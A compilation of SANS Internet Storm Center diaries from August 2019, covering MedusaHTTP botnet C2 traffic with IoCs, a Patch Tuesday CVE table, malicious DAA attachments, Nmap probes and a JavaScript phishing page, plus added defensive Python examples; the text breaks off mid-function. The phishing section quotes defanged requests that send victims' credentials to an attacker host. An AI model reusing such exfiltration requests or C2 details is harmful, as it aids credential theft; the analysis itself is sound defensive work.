Recent example of MedusaHTTP malware, (Wed, Aug 14th)

Introduction

On Monday 2019-08-12, I captured a malware payload sent through Rig Exploit Kit (EK), and it generated post-infection traffic that I was unfamiliar with.  I asked on Twitter what the malware was, and @fletchsec identified it as MedusaHTTP.  Thanks to everyone who responded to my original tweet!

In 2017, Arbor Networks (now part of NETSCOUT) published a blog about MedusaHTTP using a sample originally reported by @Zerophage1337 which was also seen after an infection through Rig EK.

Today’s ISC diary reviews the MedusaHTTP malware sample I found on Monday 2019-08-12.

The malware family

According to NETSCOUT, MedusaHTTP is an HTTP-based malware written in .NET used to create a distributed denial of service (DDoS) botnet.  MedusaHTTP first appeared in 2017, and it's based on earlier malware called MedusaIRC.  In 2017, command and control (C2) communications for MedusaHTTP were in clear text.  The sample I found used base64 strings for much of its C2 traffic.  The data inside the base64 strings was further encoded or encrypted, so I could not determine its actual content.

Infection traffic

The image below displays traffic from the original infection on Monday 2019-08-12 filtered in Wireshark.  First is Rig EK traffic, followed by post-infection traffic caused by MedusaHTTP malware.


Shown above:  Traffic from the original infection filtered in Wireshark.

Much like traffic from the 2017 sample, HTTP POST requests from an infected Windows host to a C2 server returned HTTP/1.1 100 Continue.  The infected Windows host then sent a string starting with xyz= followed by what looks like a base64 string.  During my initial infection traffic, the C2 server replied with cookie data that started with btst= and included the public IP address of the infected Windows host and some Unix-based timestamps as shown below.


Shown above:  C2 traffic generated by MedusaHTTP after my initial infection.

The base64 string in the POST data after xyz= was different for every HTTP request.  Cookie data returned from the C2 server included a string of hex characters that changed with every response.


Shown above:  Base64 strings after xyz= in the POST requests.


Shown above:  Hex strings in cookies returned by the C2 server.

I infected another Windows host less than 24 hours after the initial infection with the same MedusaHTTP sample.  This time, I saw web traffic to various casino-related domains, and the C2 server responded with data as a base64 string and no cookies.


Shown above:  Traffic from my follow-up infection caused by MedusaHTTP filtered in Wireshark (1 of 2).


Shown above:  Traffic from my follow-up infection caused by MedusaHTTP filtered in Wireshark (2 of 2).


Shown above:  MedusaHTTP C2 traffic from my follow-up infection.
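
As an added example (not part of this diary), the following Python applies the traits described above to a constructed request/response pair: the POST path from the IoCs, the xyz= base64 body, and a btst= cookie carrying an IPv4 address, Unix timestamps and a hex token. The sample messages, the host name and every value in them are constructed, not captured traffic.

```python
import base64
import binascii
import re
from datetime import datetime, timezone

# Traits of this sample's C2 as described in the diary: POST to /forums/members/api.jsp with a
# body "xyz=<base64>" that differs per request, and (first infection) a Set-Cookie "btst=" that
# carried the bot's public IP, Unix timestamps and a hex string that changed per response.
C2_PATH = "/forums/members/api.jsp"
BODY_RE = re.compile(r"^xyz=([A-Za-z0-9+/]+={0,2})$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EPOCH_RE = re.compile(r"\b1[5-7]\d{8}\b")      # 10-digit Unix times from 2017 onward
HEX_RE = re.compile(r"\b[0-9a-fA-F]{16,}\b")

def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, {lower-case header: [values]}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body

def is_base64(s: str) -> bool:
    try:
        base64.b64decode(s, validate=True)
    except binascii.Error:
        return False
    return len(s) % 4 == 0

def check_request(raw: bytes) -> dict:
    start, headers, body = parse_http(raw)
    method, path, _ = start.split(" ", 2)
    m = BODY_RE.match(body.decode("latin-1"))
    return {"method": method, "path": path, "host": headers.get("host", [None])[0],
            "c2_path": path == C2_PATH,
            "xyz_body": bool(m) and is_base64(m.group(1))}

def check_response(raw: bytes) -> dict:
    start, headers, _ = parse_http(raw)
    result = {"status": start, "btst_cookie": False, "ip": None, "timestamps": [],
              "timestamps_utc": [], "hex_token": None}
    for cookie in headers.get("set-cookie", []):
        if not cookie.startswith("btst="):
            continue
        result["btst_cookie"] = True
        ip = IPV4_RE.search(cookie)
        result["ip"] = ip.group(0) if ip else None
        result["timestamps"] = [int(t) for t in EPOCH_RE.findall(cookie)]
        result["timestamps_utc"] = [datetime.fromtimestamp(t, tz=timezone.utc).isoformat()
                                    for t in result["timestamps"]]
        token = HEX_RE.search(cookie)
        result["hex_token"] = token.group(0) if token else None
    return result

def is_medusa_like(req: dict, resp: dict) -> bool:
    """The request shape is the signal; the btst= cookie only appeared on the first infection,
    so it is reported by check_response() but not required here."""
    return req["c2_path"] and req["xyz_body"]

# Constructed sample exchange modeled on the description; values are made up (TEST-NET address).
_BODY = b"xyz=" + base64.b64encode(b"constructed-data")
SAMPLE_REQUEST = (b"POST /forums/members/api.jsp HTTP/1.1\r\n"
                  b"Host: c2.example.invalid\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n"
                  b"Content-Length: %d\r\n\r\n" % len(_BODY)) + _BODY
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Set-Cookie: btst=203.0.113.25@1565600000|1565603600|0123456789abcdef0123; path=/\r\n"
                   b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(check_request(SAMPLE_REQUEST))
    print(check_response(SAMPLE_RESPONSE))
```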

Post-infection forensics

MedusaHTTP updates the Windows registry to maintain persistence after a reboot.  The EXE for MedusaHTTP was saved under the infected user's AppData\Roaming folder.


Shown above:  MedusaHTTP malware persistent on my infected Windows host.

Indicators of compromise (IoCs)

SHA256 hash: 17901948c9c9f2f0d47f66bbac70592a7740d181f5404bf57c075ed6fa165b67

  • File size: 571,904 bytes
  • File location: C:\Users\[username]\AppData\Roaming\Google Auto Updater.exe
  • File description: MedusaHTTP malware persistent on an infected Windows host

Post-infection C2 traffic:

  • 176.119.29[.]14 port 80 – cdnshop78[.]world – POST /forums/members/api.jsp 
  • 195.22.26[.]248 port 80 – mtcunlocker[.]info – POST /forums/members/api.jsp
  • DNS queries for bbouble[.]xyz – Standard query responses: A bbouble[.]xyz SOA ns1.reg.ru

Final words

This specific sample of MedusaHTTP appears to be targeting casino domains.  Since MedusaHTTP is DDoS botnet malware, web traffic to casino domains from my infected Windows host was likely targeting these domains in conjunction with other infected Windows hosts.

Pcaps and malware for this diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


August 2019 Microsoft Patch Tuesday, (Tue, Aug 13th)

August 2019 Security Updates

Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1131 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1139 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1140 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1141 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1195 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1196 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1197 | No | No | - | - | Critical | 4.2 | 3.8
DirectX Elevation of Privilege Vulnerability | CVE-2019-1176 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3
Dynamics On-Premise Elevation of Privilege Vulnerability | CVE-2019-1229 | No | No | Less Likely | Less Likely | Important | - | -
Encryption Key Negotiation of Bluetooth Vulnerability | CVE-2019-9506 | No | No | Less Likely | Less Likely | Important | 9.3 | 8.1
Git for Visual Studio Elevation of Privilege Vulnerability | CVE-2019-1211 | No | No | Less Likely | Less Likely | Important | - | -
HTTP/2 Server Denial of Service Vulnerability | CVE-2019-9511 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7
HTTP/2 Server Denial of Service Vulnerability | CVE-2019-9512 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7
HTTP/2 Server Denial of Service Vulnerability | CVE-2019-9513 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7
HTTP/2 Server Denial of Service Vulnerability | CVE-2019-9514 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7
HTTP/2 Server Denial of Service Vulnerability | CVE-2019-9518 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7
Hyper-V Remote Code Execution Vulnerability | CVE-2019-0720 | No | No | Less Likely | Less Likely | Critical | 8.0 | 7.2
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1146 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1147 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1155 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1156 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1157 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
LNK Remote Code Execution Vulnerability | CVE-2019-1188 | No | No | Less Likely | Less Likely | Critical | 7.5 | 6.7
MS XML Remote Code Execution Vulnerability | CVE-2019-1057 | No | No | Less Likely | Less Likely | Important | 6.4 | 5.8
Microsoft Browser Memory Corruption Vulnerability | CVE-2019-1193 | No | No | Less Likely | Less Likely | Important | 6.4 | 5.8
Microsoft Browsers Security Feature Bypass Vulnerability | CVE-2019-1192 | No | No | More Likely | More Likely | Important | 2.4 | 2.2
Microsoft Defender Elevation of Privilege Vulnerability | CVE-2019-1161 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Edge Information Disclosure Vulnerability | CVE-2019-1030 | No | No | - | - | Important | 4.3 | 3.9
Microsoft Graphics Component Information Disclosure Vulnerability | CVE-2019-1078 | No | No | More Likely | More Likely | Important | 5.5 | 5.0
Microsoft Graphics Component Information Disclosure Vulnerability | CVE-2019-1148 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Microsoft Graphics Component Information Disclosure Vulnerability | CVE-2019-1153 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Microsoft Graphics Remote Code Execution Vulnerability | CVE-2019-1144 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9
Microsoft Graphics Remote Code Execution Vulnerability | CVE-2019-1145 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9
Microsoft Graphics Remote Code Execution Vulnerability | CVE-2019-1149 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9
Microsoft Graphics Remote Code Execution Vulnerability | CVE-2019-1150 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9
Microsoft Graphics Remote Code Execution Vulnerability | CVE-2019-1151 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9
Microsoft Graphics Remote Code Execution Vulnerability | CVE-2019-1152 | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9
Microsoft Guidance for Enabling LDAP Channel Binding and LDAP Signing | ADV190023 | Yes | No | - | - | - | - | -
Microsoft Live Accounts Elevation of Privilege Vulnerability | ADV190014 | No | No | - | - | Important | - | -
Microsoft Office SharePoint XSS Vulnerability | CVE-2019-1203 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Outlook Elevation of Privilege Vulnerability | CVE-2019-1204 | No | No | More Likely | More Likely | Important | - | -
Microsoft Outlook Memory Corruption Vulnerability | CVE-2019-1199 | No | No | More Likely | More Likely | Critical | - | -
Microsoft Outlook Remote Code Execution Vulnerability | CVE-2019-1200 | No | No | Less Likely | Less Likely | Critical | - | -
Microsoft SharePoint Information Disclosure Vulnerability | CVE-2019-1202 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Windows Elevation of Privilege Vulnerability | CVE-2019-1198 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.9
Microsoft Windows p2pimsvc Elevation of Privilege Vulnerability | CVE-2019-1168 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Microsoft Word Remote Code Execution Vulnerability | CVE-2019-1201 | No | No | More Likely | More Likely | Critical | - | -
Microsoft Word Remote Code Execution Vulnerability | CVE-2019-1205 | No | No | Less Likely | Less Likely | Critical | - | -
Outlook iOS Spoofing Vulnerability | CVE-2019-1218 | No | No | - | - | Important | - | -
Remote Desktop Protocol Server Information Disclosure Vulnerability | CVE-2019-1224 | No | No | More Likely | More Likely | Important | 7.5 | 6.7
Remote Desktop Protocol Server Information Disclosure Vulnerability | CVE-2019-1225 | No | No | More Likely | More Likely | Important | 7.5 | 6.7
Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-1181 | No | No | More Likely | More Likely | Critical | 9.8 | 8.8
Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-1182 | No | No | More Likely | More Likely | Critical | 9.8 | 8.8
Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-1222 | No | No | More Likely | More Likely | Critical | 9.8 | 8.8
Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-1226 | No | No | More Likely | More Likely | Critical | 9.8 | 8.8
Scripting Engine Memory Corruption Vulnerability | CVE-2019-1133 | No | No | Less Likely | Less Likely | Critical | 6.4 | 5.8
Scripting Engine Memory Corruption Vulnerability | CVE-2019-1194 | No | No | Less Likely | Less Likely | Critical | 6.4 | 5.8
SymCrypt Information Disclosure Vulnerability | CVE-2019-1171 | No | No | Less Likely | Less Likely | Important | 5.6 | 5.1
Win32k Elevation of Privilege Vulnerability | CVE-2019-1169 | No | No | - | - | Important | 7.8 | 7.0
Windows ALPC Elevation of Privilege Vulnerability | CVE-2019-1162 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.2
Windows DHCP Client Remote Code Execution Vulnerability | CVE-2019-0736 | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.8
Windows DHCP Server Denial of Service Vulnerability | CVE-2019-1206 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7
Windows DHCP Server Denial of Service Vulnerability | CVE-2019-1212 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.8
Windows DHCP Server Remote Code Execution Vulnerability | CVE-2019-1213 | No | No | - | - | Critical | 9.8 | 8.8
Windows Denial of Service Vulnerability | CVE-2019-0716 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2
Windows Elevation of Privilege Vulnerability | CVE-2019-1173 | No | No | More Likely | More Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1174 | No | No | More Likely | More Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1175 | No | No | More Likely | More Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1178 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1179 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1180 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1177 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3
Windows Elevation of Privilege Vulnerability | CVE-2019-1184 | No | No | More Likely | More Likely | Important | 6.7 | 6.0
Windows Elevation of Privilege Vulnerability | CVE-2019-1186 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3
Windows File Signature Security Feature Bypass Vulnerability | CVE-2019-1163 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Windows Graphics Component Information Disclosure Vulnerability | CVE-2019-1143 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Windows Graphics Component Information Disclosure Vulnerability | CVE-2019-1154 | No | No | - | - | Important | 5.5 | 5.0
Windows Graphics Component Information Disclosure Vulnerability | CVE-2019-1158 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0714 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2
Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0715 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2
Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0717 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2
Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0718 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2
Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0723 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2
Windows Hyper-V Remote Code Execution Vulnerability | CVE-2019-0965 | No | No | Less Likely | Less Likely | Critical | 7.6 | 6.8
Windows Image Elevation of Privilege Vulnerability | CVE-2019-1190 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Windows Information Disclosure Vulnerability | CVE-2019-1172 | No | No | Less Likely | Less Likely | Important | 4.3 | 3.9
Windows Kernel Elevation of Privilege Vulnerability | CVE-2019-1159 | No | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows Kernel Elevation of Privilege Vulnerability | CVE-2019-1164 | No | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows Kernel Information Disclosure Vulnerability | CVE-2019-1227 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Windows Kernel Information Disclosure Vulnerability | CVE-2019-1228 | No | No | - | - | Important | 5.5 | 5.0
Windows NTFS Elevation of Privilege Vulnerability | CVE-2019-1170 | No | No | More Likely | More Likely | Important | 7.9 | 7.1
Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability | CVE-2019-1223 | No | No | More Likely | More Likely | Important | 7.5 | 6.7
Windows Subsystem for Linux Elevation of Privilege Vulnerability | CVE-2019-1185 | No | No | - | - | Important | - | -
Windows VBScript Engine Remote Code Execution Vulnerability | CVE-2019-1183 | No | No | Less Likely | Less Likely | Critical | 7.5 | 6.7
XmlLite Runtime Denial of Service Vulnerability | CVE-2019-1187 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

Malicious .DAA Attachments, (Mon, Aug 12th)

Reader Jason submitted a suspicious file he received via email: attachment Swift Detail.daa

After a quick Google search, I found out that DAA stands for Direct Access Archive and that it is a disk image format like ISO. Unlike ISO files, DAA files are not recognized by Windows, so they won't be mounted when double-clicked. Only Windows machines with an image editing application installed (like PowerISO) can open these files.

I have a license for such an application and was able to extract the content: a single .exe file, no surprise!

This is exactly like the attacks we reported with ISO files, except that in this case you definitely need the right application to be able to execute the embedded malware. If you don't have it, you can't open the DAA file to execute the embedded EXE file. I doubt that these campaigns will claim many victims, if any: I don't think you'll find many corporate users who are familiar with SWIFT messages and have a tool like PowerISO installed.

I did some research and found out that the DAA format is, in a nutshell, a header followed by chunks of a compressed ISO file. There are free, open source tools to convert DAA files to ISO (i.e. extract the embedded ISO file), like DAA2ISO.

So I started to make my own tool in Python. Not a tool to parse DAA files, but a more generic one: a tool that scans through binary data for known compression methods and extracts the compressed data it finds. It's not ready for publication yet, but I had good results with this DAA sample:

My tool found sequences of zlib-compressed chunks that decompress to streams 65536 bytes (64 KB) long. It looks like the DAA format consists of an ISO file chopped up into chunks of 65536 bytes, each of which is then compressed.

I then decompressed all the chunks and had them identified by file-magic.py.
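
To illustrate the carving approach described above (this is added example code, not Didier's tool), the following Python scans a byte blob for zlib streams, inflates those that end with a valid Adler-32 checksum, reassembles the 65536-byte chunks into an image and checks it for an ISO 9660 signature. The blob it scans is a constructed stand-in with an arbitrary header; it does not follow the real DAA layout.

```python
import zlib

CHUNK_SIZE = 65536  # decompressed chunk length the diary observed for this DAA sample

def is_zlib_header(cmf: int, flg: int) -> bool:
    """RFC 1950 header check: deflate method, window size <= 32K, valid FCHECK."""
    return (cmf & 0x0F) == 8 and (cmf >> 4) <= 7 and (cmf * 256 + flg) % 31 == 0

def carve_zlib_streams(data: bytes):
    """Scan data for zlib streams and inflate each one that ends cleanly (the Adler-32
    trailer matched). Returns [(offset, compressed_length, inflated_bytes)] in file order."""
    found = []
    pos = 0
    while pos < len(data) - 1:
        if is_zlib_header(data[pos], data[pos + 1]):
            d = zlib.decompressobj()
            try:
                out = d.decompress(data[pos:])
            except zlib.error:          # header looked right but the deflate data did not
                out = b""
            if d.eof:                   # complete stream with a matching checksum
                consumed = len(data) - pos - len(d.unused_data)
                found.append((pos, consumed, out))
                pos += consumed         # continue right after this stream
                continue
        pos += 1
    return found

def reassemble(data: bytes) -> bytes:
    """Concatenate the inflated chunks; the diary observed the image stored as a
    sequence of compressed chunks, so order of appearance is image order."""
    return b"".join(out for _, _, out in carve_zlib_streams(data))

def is_iso9660(image: bytes) -> bool:
    """ISO 9660 volume descriptors start at sector 16 (offset 0x8000) and carry the
    identifier 'CD001' at byte 1 of the sector."""
    return image[0x8001:0x8006] == b"CD001"

def build_sample_blob(n_chunks: int = 3):
    """Constructed stand-in for a DAA file: an arbitrary header followed by zlib-compressed
    65536-byte slices of a constructed ISO-like image. This is NOT the real DAA layout.
    Returns (blob, original_image) so the result can be verified."""
    image = bytearray(bytes(range(256)) * (CHUNK_SIZE * n_chunks // 256))
    image[0x8000:0x8006] = b"\x01CD001"   # fake primary volume descriptor signature
    header = b"CONSTRUCTED-HEADER-NOT-REAL-DAA\x00" * 2
    chunks = [zlib.compress(bytes(image[i:i + CHUNK_SIZE]))
              for i in range(0, len(image), CHUNK_SIZE)]
    return header + b"".join(chunks), bytes(image)

if __name__ == "__main__":
    blob, _ = build_sample_blob()
    for offset, clen, out in carve_zlib_streams(blob):
        print(f"zlib stream at 0x{offset:x}: {clen} compressed -> {len(out)} bytes")
    print("ISO 9660 signature found:", is_iso9660(reassemble(blob)))
```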

There are more formats like DAA: GBI, ISZ, ... It wouldn't surprise me if these formats start to be used to deliver malware in the near future.

If you do find such samples, please submit them! Thanks!


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Nmap Defcon Release: 7.80, (Sun, Aug 11th)

A new version of nmap, 7.80, was released for Defcon.

It comes with a new Npcap driver (Windows) and new NSE scripts.

Recently, I've taken a closer look at service detection with nmap. The file nmap-service-probes contains the data to send to a TCP or UDP port (the probe) and the possible answers used for fingerprinting (the matches).

There are 3 new probes in this version:

One of the reasons I took a closer look at nmap service detection is that I had to identify a remote service from a locked-down workstation, without any chance of running nmap.

So I turned to VBA/Excel to get the job done 🙂
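
As an added illustration of the probe/match mechanism described above (example code, not part of nmap or of this diary), the following Python parses a constructed excerpt written in nmap-service-probes syntax and fingerprints constructed HTTP replies with it. The excerpt and the replies are made up; only the syntax (Probe, match, softmatch, q|...|, m|...|, p/ and v/ fields) follows the real file.

```python
import re

# Constructed excerpt in nmap-service-probes syntax; not copied from the real file.
# "Probe <proto> <name> q|bytes|" is what gets sent; match/softmatch lines hold the regex
# run against the reply plus version fields (p/product/ v/version/, $1 = capture group 1).
SAMPLE_PROBES = r"""
# comment lines and blank lines are ignored
Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n|
rarity 1
ports 80,8080
match http m|^HTTP/1\.[01] \d\d\d .*\r\nServer: Apache[/ ]([\w._-]+)|s p/Apache httpd/ v/$1/
match http m|^HTTP/1\.[01] \d\d\d .*\r\nServer: nginx/([\w._-]+)|s p/nginx/ v/$1/
softmatch http m|^HTTP/1\.[01] \d\d\d |
"""

def _delimited(field: str):
    """For a field like q|...| or m|...|: field[1] is the delimiter, content runs to the
    next occurrence of it. Returns (content, text after the closing delimiter)."""
    delim = field[1]
    end = field.index(delim, 2)
    return field[2:end], field[end + 1:]

def parse_probes(text: str):
    probes, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kw, _, rest = line.partition(" ")
        if kw == "Probe":
            proto, name, q = rest.split(" ", 2)
            payload, _ = _delimited(q)
            cur = {"proto": proto, "name": name, "matches": [],
                   # the file writes \r \n \xNN escapes literally; turn them into bytes
                   "payload": payload.encode("latin-1").decode("unicode_escape").encode("latin-1")}
            probes.append(cur)
        elif kw in ("match", "softmatch") and cur is not None:
            service, _, m = rest.partition(" ")
            pattern, tail = _delimited(m)
            flag_str, _, info = tail.partition(" ")        # e.g. "s p/Apache httpd/ v/$1/"
            flags = (re.I if "i" in flag_str else 0) | (re.S if "s" in flag_str else 0)
            fields = {k: v for k, _, v in re.findall(r"(p|v|i|h|o|d|cpe:)(.)(.*?)\2", info)}
            cur["matches"].append({"service": service, "soft": kw == "softmatch",
                                   "regex": re.compile(pattern.encode("latin-1"), flags),
                                   "fields": fields})
        # rarity, ports, sslports, totalwaitms and other directives are not needed here
    return probes

def fingerprint(probe: dict, reply: bytes):
    """Run the probe's match lines against a reply in file order; the first line that
    matches wins (simplified: nmap would keep probing after a softmatch to refine it).
    Returns None when nothing matches."""
    for m in probe["matches"]:
        hit = m["regex"].search(reply)
        if not hit:
            continue
        def expand(value):   # substitute $1, $2, ... with the regex capture groups
            return re.sub(r"\$(\d)", lambda g: hit.group(int(g.group(1))).decode("latin-1"), value)
        info = {k: expand(v) for k, v in m["fields"].items()}
        return {"service": m["service"], "soft": m["soft"],
                "product": info.get("p"), "version": info.get("v")}
    return None

# Constructed replies, not real banners
APACHE_REPLY = (b"HTTP/1.1 200 OK\r\nDate: Sun, 11 Aug 2019 10:00:00 GMT\r\n"
                b"Server: Apache/2.4.41 (Ubuntu)\r\n\r\n")
OTHER_REPLY = b"HTTP/1.0 404 Not Found\r\nServer: lighttpd\r\n\r\n"

if __name__ == "__main__":
    probe = parse_probes(SAMPLE_PROBES)[0]
    print("send:", probe["payload"])
    print(fingerprint(probe, APACHE_REPLY))
    print(fingerprint(probe, OTHER_REPLY))
```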

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


100% JavaScript Phishing Page, (Fri, Aug 9th)

While reviewing my hunting scripts results, I found a nicely obfuscated phishing page entirely based on JavaScript. The page is called ‘COURT ORDER LETTER.html’ (SHA256:54b2efcf5aef60ce3654d2f73f5fd438382b09168c6b599798ec9da8d204c562) and has a very low VT score: 2/53[1]! The file is quite big (941KB) and contains a big chunk of Base64 encoded data:


Once decoded, this data appears to not be malicious. It just contains a local copy of well-known JavaScript libraries to help in rendering nice web interfaces. The content of the libraries has just been concatenated into a big file then Base64 encoded. It contains the following pieces of code:

  • jQuery v3.1.0
  • Bootstrap v3.3.7
  • clipboard.js 1.5.12
  • Lity – v1.5.1 
  • FitVids 1.1
  • jquery.matchHeight-min.js
  • jquery.slimScroll.min.js

When you load the page in your sandbox, you get this nice screen:

The fake login page supports multiple service providers: Gmail, Office365, Yahoo!, Hotmail, AOL or "Others" (the victim can use a drop-down list to select his/her preferred authentication method).

Once the credentials have been provided, a second dialog box asks for more details: a phone number and a recovery email address. This information is very valuable from the attacker's perspective when trying to hijack the victim's account.

Finally, the attacker returns a JPG file to the victim:

All the required content is loaded from the JavaScript file. Collected information is exfiltrated to the following IP address: 185[.]224[.]138[.]93. Here are the HTTP requests generated.

The credentials:

GET hxxp://7a240[.]a240248[.]96[.]lt/MSS2RO37qTL3CBw9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/[email protected]&upw=foobar&hidCflag=

The phone number and recovery email:

POST hxxp://7a240[.][email protected][.]96[.]lt/MSS2RO37qTL3CBw9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/msoo.php
fon= 1123456789
[email protected]

Finally, the JPEG image is downloaded via:

GET hxxp://7a240[.]a240248[.]96[.]lt/MSS2RO37qTL3CBw9vO0Lk2BX8vV7jMX2MLEsIM9ddw11feM3Sjp3ijUOUFK/dsp.php

What about the obfuscation techniques?

The HTML page starts with a byte order mark (BOM[2]):

Followed by a comment:


This is followed by more than 7,000 empty lines before the obfuscated JavaScript code itself.


I don't know how this malicious file was dropped to victims; I presume via an email. Given that the page is properly designed and the code well obfuscated, I don't understand why the attacker did not take the time to implement SSL communication with the server collecting the stolen credentials and to register a nicer domain name. 96[.]lt [3] is already known as a bad domain.
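
The structural traits noted above (a BOM, a very long run of empty lines, a large Base64 blob that bundles well-known libraries, a form posting to a bare IP) can be checked mechanically during triage. The following Python script is an added example, not the diary's analysis; the HTML it inspects is constructed, with documentation-range addresses, and the library banners inside it are made up.

```python
import base64
import re

# Constructed HTML lure modeled on the diary's description (UTF-8 BOM, a comment, a long run
# of empty lines, a script holding a large Base64 blob of bundled libraries, a form posting to
# a bare IP). The contents are made up; this is not the sample from the diary.
_BUNDLE = (b"/*! jQuery v3.1.0 | (c) jQuery Foundation | jquery.org/license */\n"
           b"/*! Bootstrap v3.3.7 (http://getbootstrap.com) */\n"
           b"/*! clipboard.js 1.5.12 */\n" + b"var pad=0;" * 400)
SAMPLE_HTML = ("\ufeff<!-- constructed lure -->\n" + "\n" * 120
               + '<script>var blob="' + base64.b64encode(_BUNDLE).decode() + '";</script>\n'
               + '<form action="http://198.51.100.7/login.php" method="post"></form>\n')

B64_RE = re.compile(r"[A-Za-z0-9+/]{256,}={0,2}")                      # long Base64 runs only
LIB_RE = re.compile(rb"/\*!?\s*([A-Za-z][A-Za-z0-9.\-]*)\s+v?(\d+(?:\.\d+)+)")  # "/*! name vX.Y.Z"
ACTION_RE = re.compile(r"""action=["']([^"']+)""")

def triage_html(html: str, blank_threshold: int = 100) -> dict:
    """Report the structural traits described in the diary for one HTML file."""
    report = {"bom": html.startswith("\ufeff"), "longest_blank_run": 0,
              "base64_blobs": [], "embedded_libraries": [], "action_urls": []}
    body = html.lstrip("\ufeff")
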